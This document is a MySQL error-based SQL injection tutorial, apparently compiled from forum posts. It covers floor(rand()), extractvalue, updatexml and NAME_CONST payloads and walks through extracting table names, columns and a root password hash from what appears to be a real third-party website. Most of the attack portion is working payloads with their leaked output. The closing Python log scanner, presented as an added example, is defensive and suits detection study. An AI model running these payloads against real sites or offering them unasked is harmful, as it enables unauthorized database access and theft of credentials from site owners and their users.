1. Error-based injection via floor()
The following payloads can be used to trigger the error:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
Example:
First, a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version has been leaked through the error message. To extract other data, replace version() with the desired subquery.
For example, to retrieve the administrator's username and password:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue
Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml
Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))
Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected examples:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
Error Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
|---------------|
| TEST          |
|---------------|
| 1             |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
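All four error-based primitives collected on this page (floor(rand(0)*2) with GROUP BY, extractvalue, updatexml and the doubled NAME_CONST) only work because the application echoes raw MySQL errors back to the client. As an added example that is not part of the original post, the Python below scans constructed access-log lines for those primitives and flags responses that leak the matching error text; the log format and every log line are made up for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Request-side signatures for the four primitives in the post; every regex in a list must match.
SIGNATURES = {
    "floor_rand_groupby": [r"floor\(rand\(0\)\*2\)", r"\bgroup by\b"],
    "extractvalue": [r"\bextractvalue\("],
    "updatexml": [r"\bupdatexml\("],
    "name_const": [r"\bname_const\(.*\bname_const\("],  # same name twice -> duplicate column
}
# MySQL error fragments that carry injected data if the page echoes them to the client.
LEAK_MARKERS = ("duplicate entry", "xpath syntax error", "duplicate column name")

def normalise(query):
    """URL-decode, lowercase and drop spaces around punctuation so padding/case cannot evade."""
    text = re.sub(r"\s+", " ", unquote_plus(query).lower())
    return re.sub(r" ?([(),*=]) ?", r"\1", text)

def classify_request(url):
    """Names of the error-based primitives present in the URL's query string."""
    q = normalise(urlsplit(url).query)
    return [name for name, pats in SIGNATURES.items() if all(re.search(p, q) for p in pats)]

def leaks_db_error(body):
    """True when a response body echoes a MySQL error (display_errors left on)."""
    return any(marker in body.lower() for marker in LEAK_MARKERS)

def scan(log_lines):
    """(url, techniques, error_leaked) per suspicious line; constructed format: METHOD URL STATUS "BODY"."""
    findings = []
    for line in log_lines:
        _method, url, _status, body = line.split(" ", 3)
        hits, leaked = classify_request(url), leaks_db_error(body)
        if hits or leaked:
            findings.append((url, hits, leaked))
    return findings

# Constructed log: one benign request, then the post's floor/rand, updatexml and
# name_const payloads paired with the error text the vulnerable page echoed back.
CONSTRUCTED_LOG = [
    'GET /detail.php?id=330&sid=19 200 "<h1>test</h1>"',
    'GET /detail.php?id=1+and+(select+1+from+(select+count(*),concat(version(),'
    'floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) 500 '
    '"Duplicate entry \'5.1.33-community-log1\' for key \'group_key\'"',
    'GET /detail.php?id=1+and+1=(UPDATEXML(1,concat(0x3a,(select+user())),1)) 500 '
    '"XPATH syntax error: \':root@localhost\'"',
    'GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),'
    'NAME_CONST(version(),1))+as+x)-- 500 "Duplicate column name \'5.0.27-community-nt\'"',
]
```

A request hit together with a leaked error is the combination to alert on; the leak itself is the fix point, since turning off error display to the client removes the channel all four techniques rely on.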